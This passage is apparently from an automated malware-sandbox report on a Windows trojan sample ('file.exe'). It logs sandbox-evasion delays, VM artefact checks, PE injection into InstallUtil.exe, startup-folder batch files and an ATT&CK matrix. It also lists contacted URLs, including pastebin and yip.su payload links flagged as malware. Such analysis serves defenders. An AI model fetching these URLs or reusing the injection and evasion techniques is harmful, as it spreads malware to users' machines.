                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -595609s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -595499s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -595390s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -595281s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -595172s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -595062s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -594953s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -594844s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -594734s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -594625s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -594516s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -594391s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599543Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599327Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599077Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598958Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598685Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597141Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596809Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596482Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596372Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595499Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594391Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Jump to behavior
                      Source: C:\Windows\System32\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
                      Source: Amcache.hve.3.drBinary or memory string: VMware
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual USB Mouse
                      Source: file.exe, 00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: VBoxTray
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin
                      Source: Amcache.hve.3.drBinary or memory string: VMware, Inc.
                      Source: file.exe, 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1hbin@
                      Source: Amcache.hve.3.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                      Source: Amcache.hve.3.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                      Source: Amcache.hve.3.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                      Source: Amcache.hve.3.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                      Source: InstallUtil.exe, 00000003.00000002.3535818905.0000000001407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: Amcache.hve.3.drBinary or memory string: vmci.sys
                      Source: Amcache.hve.3.drBinary or memory string: vmci.syshbin`
                      Source: Amcache.hve.3.drBinary or memory string: \driver\vmci,\driver\pci
                      Source: Amcache.hve.3.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                      Source: Amcache.hve.3.drBinary or memory string: VMware20,1
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Generation Counter
                      Source: Amcache.hve.3.drBinary or memory string: NECVMWar VMware SATA CD00
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                      Source: Amcache.hve.3.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                      Source: Amcache.hve.3.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                      Source: Amcache.hve.3.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                      Source: Amcache.hve.3.drBinary or memory string: VMware PCI VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware VMCI Bus Device
                      Source: Amcache.hve.3.drBinary or memory string: VMware Virtual RAM
                      Source: Amcache.hve.3.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                      Source: Amcache.hve.3.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                      Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Allocates memory in foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                      Injects a PE file into a foreign processes
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                      Writes to foreign memory regions
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1190008Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.3.drBinary or memory string: MsMpEng.exe

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information11
                      Scripting                      		1
                      Valid Accounts                      		Windows Management Instrumentation1
                      Valid Accounts                      		1
                      Valid Accounts                      		1
                      Masquerading                      		OS Credential Dumping11
                      Security Software Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Web Service                      		Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault AccountsScheduled Task/Job11
                      Scripting                      		1
                      Access Token Manipulation                      		1
                      Valid Accounts                      		LSASS Memory1
                      Process Discovery                      		Remote Desktop ProtocolData from Removable Media11
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAt2
                      Registry Run Keys / Startup Folder                      		311
                      Process Injection                      		1
                      Access Token Manipulation                      		Security Account Manager31
                      Virtualization/Sandbox Evasion                      		SMB/Windows Admin SharesData from Network Shared Drive3
                      Ingress Tool Transfer                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCron1
                      DLL Side-Loading                      		2
                      Registry Run Keys / Startup Folder                      		1
                      Disable or Modify Tools                      		NTDS1
                      Application Window Discovery                      		Distributed Component Object ModelInput Capture3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      DLL Side-Loading                      		31
                      Virtualization/Sandbox Evasion                      		LSA Secrets1
                      System Network Configuration Discovery                      		SSHKeylogging4
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                      Process Injection                      		Cached Domain Credentials2
                      File and Directory Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Hidden Files and Directories                      		DCSync12
                      System Information Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                      Obfuscated Files or Information                      		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                      Software Packing                      		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                      DLL Side-Loading                      		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1490825 Sample: file.exe Startdate: 09/08/2024 Architecture: WINDOWS Score: 100 46 pastebin.com 2->46 48 yip.su 2->48 50 iplogger.com 2->50 52 Antivirus detection for URL or domain 2->52 54 Antivirus / Scanner detection for submitted sample 2->54 56 Multi AV Scanner detection for submitted file 2->56 60 7 other signatures 2->60 7 file.exe 3 2->7         started        11 cmd.exe 1 2->11         started        13 cmd.exe 1 2->13         started        15 6 other processes 2->15 signatures3 58 Connects to a pastebin service (likely for C&C) 46->58 process4 file5 38 C:\Users\user\AppData\Local\...\file.exe.log, ASCII 7->38 dropped 66 Writes to foreign memory regions 7->66 68 Allocates memory in foreign processes 7->68 70 Hides that the sample has been downloaded from the Internet (zone.identifier) 7->70 72 Injects a PE file into a foreign processes 7->72 17 InstallUtil.exe 15 9 7->17         started        22 conhost.exe 11->22         started        24 conhost.exe 13->24         started        26 conhost.exe 15->26         started        28 conhost.exe 15->28         started        30 conhost.exe 15->30         started        32 3 other processes 15->32 signatures6 process7 dnsIp8 40 pastebin.com 172.67.19.24, 443, 49721, 49724 CLOUDFLARENETUS United States 17->40 42 iplogger.com 172.67.188.178, 443, 49723, 49735 CLOUDFLARENETUS United States 17->42 44 yip.su 188.114.96.3, 443, 49722, 49725 CLOUDFLARENETUS European Union 17->44 34 C:\Users\...\Q266LY31DJuBkUgU7rnVY9MU.bat, ASCII 17->34 dropped 36 C:\Users\...367dCpczI2KMQNpAzS7xasjkw.bat, ASCII 17->36 dropped 62 Drops script or batch files to the startup folder 17->62 64 Creates HTML files with .exe extension (expired dropper behavior) 17->64 file9 signatures10

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      file.exe29%ReversingLabsWin32.Trojan.InjectorX
                      file.exe100%AviraHEUR/AGEN.1304599
                      file.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://upx.sf.net0%URL Reputationsafe
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                      https://yip.su0%Avira URL Cloudsafe
                      https://www.cloudflare.com/learning/access-management/phishing-attack/0%Avira URL Cloudsafe
                      https://iplogger.org/0%Avira URL Cloudsafe
                      http://yip.su0%Avira URL Cloudsafe
                      https://yip.su/RNWPd0%Avira URL Cloudsafe
                      https://iplogger.com/1djqU40%Avira URL Cloudsafe
                      https://counter.yadro.ru/hit?0%Avira URL Cloudsafe
                      https://iplogger.org/rules/0%Avira URL Cloudsafe
                      https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-rep0%Avira URL Cloudsafe
                      https://cdn.iplogger.org/favicon.ico0%Avira URL Cloudsafe
                      https://pastebin.com0%Avira URL Cloudsafe
                      https://yip.su/redirect-0%Avira URL Cloudsafe
                      https://pastebin.com/raw/V6VJsrV3100%Avira URL Cloudmalware
                      https://pastebin.com/raw/V6VJsrV31https://yip.su/RNWPd.exe7https://iplogger.com/1djqU40%Avira URL Cloudsafe
                      https://iplogger.org/privacy/0%Avira URL Cloudsafe
                      https://yip.su/RNWPd.exe100%Avira URL Cloudmalware
                      https://www.cloudflare.com/5xx-error-landing0%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      yip.su
                      		188.114.96.3
                      		truefalse
                        		unknown
                        pastebin.com
                        		172.67.19.24
                        		truetrue
                          		unknown
                          iplogger.com
                          		172.67.188.178
                          		truefalse
                            		unknown

                            Contacted URLs

                            NameMaliciousAntivirus DetectionReputation
                            https://iplogger.com/1djqU4false
                            • Avira URL Cloud: safe
                            		unknown
                            https://pastebin.com/raw/V6VJsrV3false
                            • Avira URL Cloud: malware
                            		unknown
                            https://yip.su/RNWPd.exefalse
                            • Avira URL Cloud: malware
                            		unknown

                            URLs from Memory and Binaries

                            NameSourceMaliciousAntivirus DetectionReputation
                            https://www.cloudflare.com/learning/access-management/phishing-attack/InstallUtil.exe, 00000003.00000002.3538302079.00000000032D3000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.000000000336C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003348000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://counter.yadro.ru/hit?InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://yip.suInstallUtil.exe, 00000003.00000002.3538302079.0000000003317000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003271000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://yip.suInstallUtil.exe, 00000003.00000002.3538302079.0000000003317000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://yip.su/RNWPdInstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://cdn.iplogger.org/favicon.icoInstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://iplogger.org/rules/InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            https://iplogger.org/InstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.0000000003258000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000003.00000002.3538302079.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://upx.sf.netAmcache.hve.3.drfalse
                            • URL Reputation: safe
                            		unknown
                            https://cdn.iplogger.org/redirect/logo-dark.png);background-position:center;background-repeat:no-repInstallUtil.exe, 00000003.00000002.3538302079.000000000331E000.00000004.00000800.00020000.00000000.sdmp, 3BKVENDizermJCmNwCB42ME3.exe.3.dr, lHi4knFRqmK4FFdSjJjLFDSD.exe.3.dr, vQTyYvkkcYOdC3ep2WUufnYJ.exe.3.dr, ya3fW80pEvNY3Pp8eIbfmN8e.exe.3.drfalse
                            • Avira URL Cloud: safe
                            		unknown
